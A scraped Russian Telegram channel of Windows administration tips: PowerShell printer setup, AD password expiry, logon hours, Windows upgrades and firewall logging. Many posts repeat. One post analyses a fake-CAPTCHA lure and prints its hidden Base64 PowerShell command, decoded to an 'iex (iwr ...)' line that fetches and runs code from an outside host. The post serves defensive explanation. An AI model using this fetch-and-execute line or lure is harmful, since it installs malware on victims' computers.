🖨 Для выполнения типовых задач управления принтерами на компьютерах пользователей, не обязательно подключаться к рабочему столу пользователя. Большинство операций можно выполнить удаленно через консоль PowerShell.
📱 Например, создание нового принтера на удаленном компьютере в сессии PowerShell может выглядеть так:
🔹 Подключаемся к компьютеру пользователя через PowerShell Remoting:
🔹Добавление драйвера в хранилище драйверов:
🔹Установка драйвера печати:
🔹Создать IP порт печати для подключения сетевого принтера:
🔹Создать новый принтер:
Управление принтерами и драйверами печати в Windows из PowerShell
📱 Например, создание нового принтера на удаленном компьютере в сессии PowerShell может выглядеть так:
🔹 Подключаемся к компьютеру пользователя через PowerShell Remoting:
Enter-PSSession -ComputerName Comp1
🔹Добавление драйвера в хранилище драйверов:
pnputil.exe -i -a "\\server1\drivers\KYOCERA\ OEMsetup.inf"
🔹Установка драйвера печати:
Add-PrinterDriver -Name "Kyocera Classic Universaldriver PCL6"
🔹Создать IP порт печати для подключения сетевого принтера:
Add-PrinterPort -Name "IP_192.168.10.26" -PrinterHostAddress "192.168.10.26"
🔹Создать новый принтер:
Add-Printer -Name "Ricoh IM 2702" -DriverName "Kyocera Classic Universaldriver PCL6" -PortName "IP_192.168.10.26" -Verbose
Управление принтерами и драйверами печати в Windows из PowerShell
🔄 Несмотря на то, что Microsoft убрала требование регулярной смены паролей пользователей из своих рекомендаций безопасности, в большинстве on-prem доменов Active Directory по прежнему включена политика, ограничивающая макс. срок действия паролей.
🤦♂️Часто пользователи забывают (или не могут из за особенностей подключений к сети) вовремя сменить свой пароль, срок действия которого истекает, что вызывает лишние обращения в службу поддержки.
✅ В статье показано как узнать, когда истекает пароль пользователя в домене, и как заблаговременно напомнить пользователю о том, что нужно сменить пароль: с помощью встроенного напоминания Windows, скрипта PowerShell и email оповещения.
Напоминание о смене пароля пользователя в домене AD
🤦♂️Часто пользователи забывают (или не могут из за особенностей подключений к сети) вовремя сменить свой пароль, срок действия которого истекает, что вызывает лишние обращения в службу поддержки.
✅ В статье показано как узнать, когда истекает пароль пользователя в домене, и как заблаговременно напомнить пользователю о том, что нужно сменить пароль: с помощью встроенного напоминания Windows, скрипта PowerShell и email оповещения.
Напоминание о смене пароля пользователя в домене AD
⚠️ Несколько раз встречался со странным багом в консоли PowerShell, когда при наборе или вставке кода в cli не печатаются/вырезались заглавные буквы. Проблема возникала только тогда, когда при запуске процесса powershell.exe в системе выбрана кириллическая раскладка.
✅Решение сводится к обновлению модуля PSReadLine на более свежую версию путем переустановки:
https://winitpro.ru/index.php/2024/10/15/zaglavnye-bukvy-v-powershell/
✅Решение сводится к обновлению модуля PSReadLine на более свежую версию путем переустановки:
get-module|where name -eq "psreadline"|select name,path
remove-module psreadline
remove-item "c:\program files\windowspowershell\modules\psreadline\*" -recurse -force
Install-Module PSReadLine
Модуль PSReadLine обеспечивает подсветку синтаксиса, автозавершение команд, историю команд PowerShell и другие полезные функции, делающие работу в консоли более удобной:https://winitpro.ru/index.php/2024/10/15/zaglavnye-bukvy-v-powershell/
⌛️Периодически встречаются ситуации, когда пользователь просит продлить срок действия его пароля в AD. Обычно это связано со сценариями удаленного подключения к домену (VPN, веб-клиенты), когда пользователь не может вовремя сменить свой пароль (нет инструментов), а работу работать надо.
⚠️Самое простое это поставить галку и включить ему бессрочный пароль, но скорее всего вы про это забудете и у пользователь остается пароль без ограничения срока действия.
📝 Время последней смены пароля учетной записи в AD хранится в атрибуте pwdLastSet. Напрямую отредактировать значение этого атрибута и указать здесь произвольную дату нельзя. Однако этому атрибуту можно последовательно задать два значения:
✅ Это сбросит дату установки пароля на текущую, продлив его срок действия и пользователь сможет продолжить работу
Продлить время истечения (срок действия) пароля пользователя в AD
⚠️Самое простое это поставить галку и включить ему бессрочный пароль, но скорее всего вы про это забудете и у пользователь остается пароль без ограничения срока действия.
📝 Время последней смены пароля учетной записи в AD хранится в атрибуте pwdLastSet. Напрямую отредактировать значение этого атрибута и указать здесь произвольную дату нельзя. Однако этому атрибуту можно последовательно задать два значения:
Set-ADUser a.ivanov -Replace @{pwdLastSet='0'}
Set-ADUser a.ivanov -Replace @{pwdLastSet='-1'}✅ Это сбросит дату установки пароля на текущую, продлив его срок действия и пользователь сможет продолжить работу
Продлить время истечения (срок действия) пароля пользователя в AD
⏰Функционал ограничения доступа к компьютеру по времени в составе родительского контроля (
✅ Например, следующая команда разрешит локальному пользователю maxim вход по будням с 9 до 10, и с 14 до 19, а в выходные с 12 до 14 (мин. шаг времени 1 час):
Вывести текущие настройки ограничения:
Cбросить ограничения по времени входа:
🔹 Затем с помощью параметра групповой политики Set Action to take when logon hours expire нужно указать, нужно ли завершить или заблокировать сессию пользователя, когда разрешенное время работы истекло.
Ограничение по время работы (входа) в Windows для локальных пользователей
Microsoft Family Safety) в Windows 10 и 11 доступен только для учетных записей Microsoft (облачных). Для локальных учетных записей, можно настроить ограничения для входа в компьютер по времени из командной строки с помощью net use. Чаще всего это используется, когда нужно включить простейшее ограничение времени нахождения ребенка за компьютером.✅ Например, следующая команда разрешит локальному пользователю maxim вход по будням с 9 до 10, и с 14 до 19, а в выходные с 12 до 14 (мин. шаг времени 1 час):
net user maksim /times:M-F,9:00-10:00,14:00-19:00;Sa-Su,12:00-14:00
Вывести текущие настройки ограничения:
net user maksim
Cбросить ограничения по времени входа:
net user maksim /time:all
🔹 Затем с помощью параметра групповой политики Set Action to take when logon hours expire нужно указать, нужно ли завершить или заблокировать сессию пользователя, когда разрешенное время работы истекло.
Ограничение по время работы (входа) в Windows для локальных пользователей
🔄 Стандартный установщик setup.exe в дистрибутивах Windows можно использовать не только для интерактивной установки операционной системы, но и для обновления версии (билда) Windows на компьютере. Кроме интерактивного режима, setup.exe поддерживает параметры командной строки, которые можно использовать для офлайн обновления билда Windows.
1️⃣ Проверить, совместим ли компьютер с новым билдом Windows 11, который находится в установочном (оффлайн) образе:
Статус проверки на совместимость будет содержаться в переменной:
2️⃣ Выполнить апгрейд билда Windows из офлайн образа в тихом режиме:
✅ С помощью параметров командной строки setup.exe можно автоматизировать тестирование возможности обновления и непосредственно обновление билда Windows 10/11 на компьютерах пользователей с помощью SCCM, MDT или других средств автоматизации.
Ручное обновление билда (версии) Windows из командной строки
1️⃣ Проверить, совместим ли компьютер с новым билдом Windows 11, который находится в установочном (оффлайн) образе:
start /wait SETUP.EXE /Auto Upgrade /NoReboot /DynamicUpdate Disable /Compat ScanOnly
Статус проверки на совместимость будет содержаться в переменной:
echo %errorlevel%
2️⃣ Выполнить апгрейд билда Windows из офлайн образа в тихом режиме:
start /wait .\W1124h2\SETUP.exe /auto upgrade /DynamicUpdate disable /showoobe None /Telemetry Disable /Copylogs %SystemDrive%\temp /EULA Accept /compat IgnoreWarning /NoReboot
✅ С помощью параметров командной строки setup.exe можно автоматизировать тестирование возможности обновления и непосредственно обновление билда Windows 10/11 на компьютерах пользователей с помощью SCCM, MDT или других средств автоматизации.
Ручное обновление билда (версии) Windows из командной строки
✅ Пропустил новость, что первого ноября официально релизнулся Windows Server 2025.
Что нового:
🔹 Hot patching для клиентов Azure Arc – установка обновлений безопасности без перезагрузки
🔹 Улучшенная производительность для NVMe хранилищ – до 70% увеличение IOPS по сравнению с предыдущими версиями на идентичном оборудовании
🔹 Active Directory - новый функциональный уровень домена и леса AD; расширенные возможности восстановления удаленных объектов; поддержка NUMA благодаря чему службы ADDS могут задействовать все ядра CPU.
🔹 Включенный по умолчанию Credential Guard для защиты учетных данных
🔹 SMB over QUIC - для безопасного доступа к файловым ресурсам через Интернет
🔹 Новый тип управляемых учетных записей AD с автоматическим меняющимися паролями– делегируемые учетные записи (dMSA, delegated Managed Service Account)
🔹 Блочное клонирование – значительное повышение скорости копирования файлов на файловой системе ReFS для Dev Drive
🔹 OpenSSH установлен по умолчанию
🔹 WinGet установлен по умолчанию
🔹 Служба удаленного доступа RRAS не поддерживает устаревшие VPN протоколы PPTP и L2TP
🔹 Новые возможности в LAPS
🔹 AccelNet (Accelerated Networking)– увеличение производительности и снижение нагрузки на CPU для виртуальных машин при использовании SR-IOV в кластере
🔹 DTrace – встроенная утилита для отслеживания и устранения неполадок в работе системы в реальном времени.
🔹 Виртуализация GPU в виде разделения GPU или Multi-Instance GPU
🔹Также можно отметить защиту ключей на основе виртуализации и функцию беспроводной локальной сети, которая теперь установлена по умолчанию.
🔄 Windows Server 2025 доступен через два канала: долгосрочный канал обслуживания (LTSC) и годовой канал (AC, Annual Channel). Основная поддержка завершится 9 октября 2029 года, а расширенная — 10 октября 2034 года
Подробное описание всех новых возможностей на официальном сайте:
What's new in Windows Server 2025
Что нового:
🔹 Hot patching для клиентов Azure Arc – установка обновлений безопасности без перезагрузки
🔹 Улучшенная производительность для NVMe хранилищ – до 70% увеличение IOPS по сравнению с предыдущими версиями на идентичном оборудовании
🔹 Active Directory - новый функциональный уровень домена и леса AD; расширенные возможности восстановления удаленных объектов; поддержка NUMA благодаря чему службы ADDS могут задействовать все ядра CPU.
🔹 Включенный по умолчанию Credential Guard для защиты учетных данных
🔹 SMB over QUIC - для безопасного доступа к файловым ресурсам через Интернет
🔹 Новый тип управляемых учетных записей AD с автоматическим меняющимися паролями– делегируемые учетные записи (dMSA, delegated Managed Service Account)
🔹 Блочное клонирование – значительное повышение скорости копирования файлов на файловой системе ReFS для Dev Drive
🔹 OpenSSH установлен по умолчанию
🔹 WinGet установлен по умолчанию
🔹 Служба удаленного доступа RRAS не поддерживает устаревшие VPN протоколы PPTP и L2TP
🔹 Новые возможности в LAPS
🔹 AccelNet (Accelerated Networking)– увеличение производительности и снижение нагрузки на CPU для виртуальных машин при использовании SR-IOV в кластере
🔹 DTrace – встроенная утилита для отслеживания и устранения неполадок в работе системы в реальном времени.
🔹 Виртуализация GPU в виде разделения GPU или Multi-Instance GPU
🔹Также можно отметить защиту ключей на основе виртуализации и функцию беспроводной локальной сети, которая теперь установлена по умолчанию.
🔄 Windows Server 2025 доступен через два канала: долгосрочный канал обслуживания (LTSC) и годовой канал (AC, Annual Channel). Основная поддержка завершится 9 октября 2029 года, а расширенная — 10 октября 2034 года
Подробное описание всех новых возможностей на официальном сайте:
What's new in Windows Server 2025
🎯 На днях наткнулся на довольно забавный сценарий атаки, цель которой установка вредоносного ПО на компьютер Windows. В самом векторе атаки нет ничего не обычного, кроме пожалуй того, что для внедрения зловреда используются возможности PowerShell.
👉 Итак, при перенаправлении скриптом с вероятно зараженного сайта на прокладочную веб-страничку в браузере появился запрос на прохождение некой капчи. Для прохождения проверки пользователю предлагалось нажать кнопку на странице, а затем
🛑 Что под капотом? При нажатии кнопки на сайте в буфер обмена копируется строка вызова PowerShell вида:
🔹Из аргументов понятно, что это должно запустить скрытый PowerShell процесс (
🔹Сама выполняемая команда обсфуцирована с помощью кодировки Base64. Чтобы получить PowerShell команду в исходном виде, нужно декодировать ее из Base64 с помощью простой функции:
Что вернуло исходный код:
▶️ В данном случае iex (алиас для
✅ В общем-то довольно нехитрая атака, сценарий реализации основан на социальной инженерии, когда пользователь бездумно выполнит инструкцию на фишинговом сайте. Включенная по умолчанию политика запуска скриптов PowerShell Execution заблокирует запуск такого скрипта, но все же не даст 100% гарантии, т.к. можно запустить скрипт и в обход политики.
👉 Итак, при перенаправлении скриптом с вероятно зараженного сайта на прокладочную веб-страничку в браузере появился запрос на прохождение некой капчи. Для прохождения проверки пользователю предлагалось нажать кнопку на странице, а затем
Win +R -> Ctrl+V -> Enter. Выполнив эту инструкцию, пользователь запустит к себе зловреда. 🤦♂️🛑 Что под капотом? При нажатии кнопки на сайте в буфер обмена копируется строка вызова PowerShell вида:
powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA=
🔹Из аргументов понятно, что это должно запустить скрытый PowerShell процесс (
-W Hidden), который должен выполнить некую закодированную команду (-eC). Предполагается что это строка будет запущена доверчивым пользователем через стандартное окно "Выполнить" в меню Пуск. 🔹Сама выполняемая команда обсфуцирована с помощью кодировки Base64. Чтобы получить PowerShell команду в исходном виде, нужно декодировать ее из Base64 с помощью простой функции:
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA="))Что вернуло исходный код:
iex (iwr https://iplogger.ru/250925 -UseBasicParsing).Content
▶️ В данном случае iex (алиас для
Invoke-Expression) используется для запуска следующей команды iwr (Invoke-WebRequest). IWR позволяет получить содержимое веб страницы, на которой размещен PowerShell код для внедрения зловреда. В результате будет запущен PowerShell скрипт, который скачает ZIP архив, распакует его и запустит некий процесс setup.exe. Дальше – дело техники. 👌 ✅ В общем-то довольно нехитрая атака, сценарий реализации основан на социальной инженерии, когда пользователь бездумно выполнит инструкцию на фишинговом сайте. Включенная по умолчанию политика запуска скриптов PowerShell Execution заблокирует запуск такого скрипта, но все же не даст 100% гарантии, т.к. можно запустить скрипт и в обход политики.
WindowsITPro - winitpro.ru
✅ Пропустил новость, что первого ноября официально релизнулся Windows Server 2025. Что нового: 🔹 Hot patching для клиентов Azure Arc – установка обновлений безопасности без перезагрузки 🔹 Улучшенная производительность для NVMe хранилищ – до 70% увеличение…
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥Установка единых обоев рабочего стола и экрана блокировки Windows в корпоративном стиле - один из самых популярных способов создания единого визуального пространства для сотрудников и клиентов. Одинаковые обои придают рабочему пространству более профессиональный и упорядоченный вид, что может положительно сказаться на восприятии компании клиентами и партнерами.
🔹 Рисунок обоев может включать логотипы, графику в корпоративных цветах или изображения, связанные с деятельностью компании. На рисунок обоев можно наложить полезную информацию для сотрудников (телефоны и адреса тех. поддержки, важные объявления, etc).
🔹 Через GPO можно заблокировать смену обоев, чтобы пользователи не заменяли корпоративные фоны на неуместные или провокационные картинки.
✅ В статье описано как с помощью групповых политик распространить на компьютеры пользователей изображения для фонового рисунка рабочего стола и фона экрана входа в систему (экрана блокировки Windows).
Задать фоновый рисунок рабочего стола и экрана блокировки Windows через групповые политики
🔹 Рисунок обоев может включать логотипы, графику в корпоративных цветах или изображения, связанные с деятельностью компании. На рисунок обоев можно наложить полезную информацию для сотрудников (телефоны и адреса тех. поддержки, важные объявления, etc).
🔹 Через GPO можно заблокировать смену обоев, чтобы пользователи не заменяли корпоративные фоны на неуместные или провокационные картинки.
✅ В статье описано как с помощью групповых политик распространить на компьютеры пользователей изображения для фонового рисунка рабочего стола и фона экрана входа в систему (экрана блокировки Windows).
Задать фоновый рисунок рабочего стола и экрана блокировки Windows через групповые политики
🖨Принтеры HP могут показывать пользователям различные всплывающие уведомления о состоянии принтера. Особо раздражают постоянно всплывающие уведомления об использовании неоригинальных (заправленных) картриджей HP.
ℹ️ Для отправки этих уведомлений используется функция Status Notification Pop-up (SNP) в драйвере печати HP, которая опрашивает состояние принтера по SNMP. Эта функция отключена по-умолчанию начиная с версии HP Universal Print Driver 6.4.1. Поэтому чтобы избавиться от всплывающих уведомления от сетевых принтеров, достаточно обновись драйвер. HP UPD.
🔹 Если не хотите обновлять драйвер, можно отключить отправку уведомлений SNP в настройках драйвера принтера HP. Или воспользуйтесь утилитой setup.exe, включенной в состав Universal Print Driver:
Отключить всплывающие уведомления для принтеров HP
ℹ️ Для отправки этих уведомлений используется функция Status Notification Pop-up (SNP) в драйвере печати HP, которая опрашивает состояние принтера по SNMP. Эта функция отключена по-умолчанию начиная с версии HP Universal Print Driver 6.4.1. Поэтому чтобы избавиться от всплывающих уведомления от сетевых принтеров, достаточно обновись драйвер. HP UPD.
🔹 Если не хотите обновлять драйвер, можно отключить отправку уведомлений SNP в настройках драйвера принтера HP. Или воспользуйтесь утилитой setup.exe, включенной в состав Universal Print Driver:
install.exe /gdssnp /ni /q /nd
Отключить всплывающие уведомления для принтеров HP
💾 Функция автоматического резервного копирования файлов реестра по-умолчанию отключена начиная с Windows 10 1809. И зря. Ради минимальной экономия места (100-200 Мб) пользователи потеряли возможность быстро восстановить работоспособность Windows, просто заменив поврежденные файлы реестра рабочими версиями из резервный копии. Хотя этой функцией большинство пользуется крайне редко, лучше иметь такой бэкап, чем совсем никакого 🤷♂️.
✅ Включить автоматический бэкап в последних версиях Windows 10 и 11 можно, создав в реестре параметр EnablePeriodicBackup:
Теперь задание автоматического обслуживания системы (в Windows 11 запускается раз в сутки) будет дергать задание планировщика RegIdleBackup, которое будет копировать файлы кустов реестра в каталог
Включить автоматический бэкап системного реестра в Windows 10/11
✅ Включить автоматический бэкап в последних версиях Windows 10 и 11 можно, создав в реестре параметр EnablePeriodicBackup:
reg add "HKLM\System\CurrentControlSet\Control\Session Manager\Configuration Manager" /v EnablePeriodicBackup /t REG_DWORD /d 1
Теперь задание автоматического обслуживания системы (в Windows 11 запускается раз в сутки) будет дергать задание планировщика RegIdleBackup, которое будет копировать файлы кустов реестра в каталог
%windir%\System32\config\RegBack
Включить автоматический бэкап системного реестра в Windows 10/11
🎓 Согласно схеме лицензирования Microsoft все пользователи или клиентские устройства, подключающиеся к рабочему столу на терминальном сервере/ферме RDS должны быть лицензированы. Для выдачи и отслеживания клиентских терминальных лицензий используется отдельная роль Windows Server под названием Remote Desktop Licensing.
🛠 По ссылке доступен полный гайд по установке и настройке сервера лицензирования RDS на Windows Server версий от 2016 до 2022. В статье рассмотрены:
1️⃣ Установка роли роли RDS-Licensing
2️⃣ Активация сервера лицензий RDS и установка паков клиентских лицензий (RDS CAL)
3️⃣ Отличия между RDS Per Device и Per User лицензиями (CAL), совместимость старых RDS CAL с более новыми версиями Windows Server
4️⃣ Настройка хостов RDSH на использование сервера лицензий RDS (через GPO или PowerShell), используемые сетевые порты
5️⃣ Управление лицензиями RDS CAL, отчеты, отзыв выданных CAL
Установка и активация сервера лицензирования RDS на Windows Server
🛠 По ссылке доступен полный гайд по установке и настройке сервера лицензирования RDS на Windows Server версий от 2016 до 2022. В статье рассмотрены:
1️⃣ Установка роли роли RDS-Licensing
2️⃣ Активация сервера лицензий RDS и установка паков клиентских лицензий (RDS CAL)
3️⃣ Отличия между RDS Per Device и Per User лицензиями (CAL), совместимость старых RDS CAL с более новыми версиями Windows Server
4️⃣ Настройка хостов RDSH на использование сервера лицензий RDS (через GPO или PowerShell), используемые сетевые порты
5️⃣ Управление лицензиями RDS CAL, отчеты, отзыв выданных CAL
Установка и активация сервера лицензирования RDS на Windows Server
⚠️Довольно часто от администраторов можно услышать распространенное мнение, что при наличии нескольких контроллеров домена Active Directory, дополнительно бэкапить AD не нужно. Аргументируется это тем, что вероятность выхода из строя сразу всех DC минимальна, а при поломке отдельного DC, проще поднять рядом на площадке новый и реплицировать на него каталог AD.
🌋Однако при этом забывают о сценариях, когда сразу все DC выходят из чата: это может быть атака вирусов/шифровальщиков, катастрофические сценарии с полной потерей ЦОДа, случайное (или преднамеренное) удаление целых разделов каталога, восстановление давно удаленных объектов. Все эти сценарии уже не раз случались и могут еще не раз произойти в реальной жизни.
Именно для предотвращения таких случаев нужно обязательно настраивать бэкап AD.
✅ Если у вас нет отдельной системы резервного копирования, которая умеет в AD, можно настроить регулярный бэкап контроллера домена с помощью встроенных средств Windows Server Backup.
🛠В статье показан пример PowerShell скрипта, использующий встроенную консольную утилиту WSB (
Резервное копирование контроллеров домена AD с помощью встроенных средств Windows Server Backup
🌋Однако при этом забывают о сценариях, когда сразу все DC выходят из чата: это может быть атака вирусов/шифровальщиков, катастрофические сценарии с полной потерей ЦОДа, случайное (или преднамеренное) удаление целых разделов каталога, восстановление давно удаленных объектов. Все эти сценарии уже не раз случались и могут еще не раз произойти в реальной жизни.
Именно для предотвращения таких случаев нужно обязательно настраивать бэкап AD.
✅ Если у вас нет отдельной системы резервного копирования, которая умеет в AD, можно настроить регулярный бэкап контроллера домена с помощью встроенных средств Windows Server Backup.
🛠В статье показан пример PowerShell скрипта, использующий встроенную консольную утилиту WSB (
wbadmin.exe) для резервного копирования System State контроллера домена в сетевую папку, а также пример задания планировщика для автоматического резервного копирования Active DirectoryРезервное копирование контроллеров домена AD с помощью встроенных средств Windows Server Backup
🚑 MSDaRT (Microsoft Diagnostics and Recovery Toolset) это официальный инструмент от Microsoft для создания дисков восстановления (загрузочных дисков) на базе WinPE, ранее широко известный как ERD Commander. Несмотря, что этот проект уже давно не развивается и доступен при наличии подписки, для большинства не составит труда найти оригинальный образ Microsoft Desktop Optimization Pack (MDOP) и сгенерировать собственный диск DaRT для восстановления системы, который поддерживает в том числе последние билды Windows 10 и 11.
✅ Образ MSDaRT включает в себя базовые инструменты, для исправления типовых проблем, когда Windows не загружается или пользователь не может войти в систему:
🔹Средство разблокировки/сброса пароля администратора
🔹Утилиты восстановления удаленных файлов и разделов диска
🔹Графический проводник
🔹Инструмент удаления проблемных обновлений
🔹Средства проверки образа и другие
🛠 Администраторы могут самостоятельно интегрировать в загрузочный образ MS DaRT необходимые драйвера и portable утилиты, превратив его в полноценный LiveCD. Если в вашей корпоративной среде по соображениям безопасности запрещено использовать сторонние диски восстановления/ LiveCD, а функционала встроенной WinRE недостаточно, то образ DaRT будет хорошей отправной точкой для создания собственного образа восстановления Windows.
Создаем диск восстановления Windows на базе MSDaRT
✅ Образ MSDaRT включает в себя базовые инструменты, для исправления типовых проблем, когда Windows не загружается или пользователь не может войти в систему:
🔹Средство разблокировки/сброса пароля администратора
🔹Утилиты восстановления удаленных файлов и разделов диска
🔹Графический проводник
🔹Инструмент удаления проблемных обновлений
🔹Средства проверки образа и другие
🛠 Администраторы могут самостоятельно интегрировать в загрузочный образ MS DaRT необходимые драйвера и portable утилиты, превратив его в полноценный LiveCD. Если в вашей корпоративной среде по соображениям безопасности запрещено использовать сторонние диски восстановления/ LiveCD, а функционала встроенной WinRE недостаточно, то образ DaRT будет хорошей отправной точкой для создания собственного образа восстановления Windows.
Создаем диск восстановления Windows на базе MSDaRT
🔑Большинство крупных производителей компьютеров/ноутбуков с предустановленной Windows вшивают в BIOS или UEFI компьютера ключ для автоматической активации Windows.
💾 Во времена Windows 7 сертификат вендора, информация о редакции, и ключе продукта прошивались в специальную SLIC таблицу в BIOS. Сейчас от этого подхода практически отказались и вендор прописывает ключ (OEM embedded key) непосредственно в прошивку UEFI. Благодаря этому при установке Windows установщик считывает ключ продукта из прошивки и автоматически устанавливает редакцию, соответствующую ключу.
⚠️Проблема возникает, когда пользователь хочет выполнить чистую установку другой редакции Windows на такое устройство (например,
✅ Чтобы установщик Windows игнорировал информацию о вшитом ключе, нужно создать на установочной USB флешке в каталоге \sources файл ei.cfg с текстом:
После этого при установке Windows, должно появится меню выбора редакций.
Нет выбора редакции при чистой установке Windows
💾 Во времена Windows 7 сертификат вендора, информация о редакции, и ключе продукта прошивались в специальную SLIC таблицу в BIOS. Сейчас от этого подхода практически отказались и вендор прописывает ключ (OEM embedded key) непосредственно в прошивку UEFI. Благодаря этому при установке Windows установщик считывает ключ продукта из прошивки и автоматически устанавливает редакцию, соответствующую ключу.
⚠️Проблема возникает, когда пользователь хочет выполнить чистую установку другой редакции Windows на такое устройство (например,
Pro вместо предустановленной Home). Установщик Windows при этом пропускает окно выбора редакции и автоматически устанавливает версию, соответствующую ключу.✅ Чтобы установщик Windows игнорировал информацию о вшитом ключе, нужно создать на установочной USB флешке в каталоге \sources файл ei.cfg с текстом:
[EditionID]
[Channel]
Retail
После этого при установке Windows, должно появится меню выбора редакций.
Нет выбора редакции при чистой установке Windows
🔥 Встроенный брандмауэр Windows Firewall по умолчанию не журналирует входящие и исходящие подключения, проходящие через него. Если у вас есть подозрение, что на компьютере Windows встроенный файервол блокирует подключение на конкретный порт или с определенного IP адреса, не нужно немедленно его полностью отключать, чтобы проверить это. Правильнее будет включить логирование отклоненных (DROP) соединений, найти в логах попытки подключения (источник, порт) и создать соответствующее разрешающее правило. 🧱
☑️ Можно включить запись логов в текстовый файл, например:
☑️Или можно писать сетевые логи в журнал событий Windows (Event Viewer). Это иногда более удобно, чем грепать текстовые файлы. Для этого включается политика аудита:
✅ В статье рассмотрено как включить лог Windows Firewall и базовые методы поиска и анализов логов брандмауэра.
Включаем логирование в Windows Firewall, анализ логов
☑️ Можно включить запись логов в текстовый файл, например:
Set-NetFireWallProfile -Profile Public -LogBlocked True -LogMaxSize 20480 -LogFileName "%systemroot%\system32\LogFiles\Firewall\pfirewall.log" -Verbose
☑️Или можно писать сетевые логи в журнал событий Windows (Event Viewer). Это иногда более удобно, чем грепать текстовые файлы. Для этого включается политика аудита:
Auditpol /set /category:"System" /SubCategory:"Filtering Platform Packet Drop" /failure:enable
✅ В статье рассмотрено как включить лог Windows Firewall и базовые методы поиска и анализов логов брандмауэра.
Включаем логирование в Windows Firewall, анализ логов